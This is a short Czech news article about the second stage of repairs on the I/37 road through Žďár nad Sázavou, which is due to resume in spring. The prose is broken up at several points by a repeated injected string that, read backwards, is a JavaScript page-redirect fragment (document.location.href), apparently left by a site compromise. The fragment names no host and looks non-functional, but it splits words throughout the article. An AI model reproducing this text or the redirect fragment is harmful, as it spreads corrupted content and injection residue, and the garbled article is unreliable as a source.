Rainbow page separator

Stavební dělníci se na průtah Žďárem vrátí zase na jaře

Pátek, 5. listopadu 2021

Žďár nad Sázavou / Na jaře se na frekven[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovanou silnici I/37 ve spodní části Žďáru po zimní technologické pauze opět vrátí stavební dělníci. Po dopravních komplikacích spojených s opravou úseku komunikace, kterým mo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toristé museli čelit od 12. července až do konce října, dojde na druhou etapu stavebních prací. Ty zahrnou zbývající část státní komunikace až po výjezd ze Žďáru. I v [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to případě mají činnosti na obnově silnice probíhat za její částečné uzavírky, tedy vždy v jednom pruhu a za provozu kyvadlově řízeném semafory.
Důvodem k rekonstrukci úseku silnice za více než osmatřicet milionů korun prováděné ve finanční režii Ředitelství silnic a dálnic ČR (ŘSD) jsou různé typy příčných a podélných trhlin i vyjeté koleje. Diagnostika prokázala rovněž ztrátu asfal[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tového tmelu, až hloubkovou korozi, kdy je třeba obnovit kryt vozovky a místně provést sanaci konstrukčních vrstev včetně výměny podloží.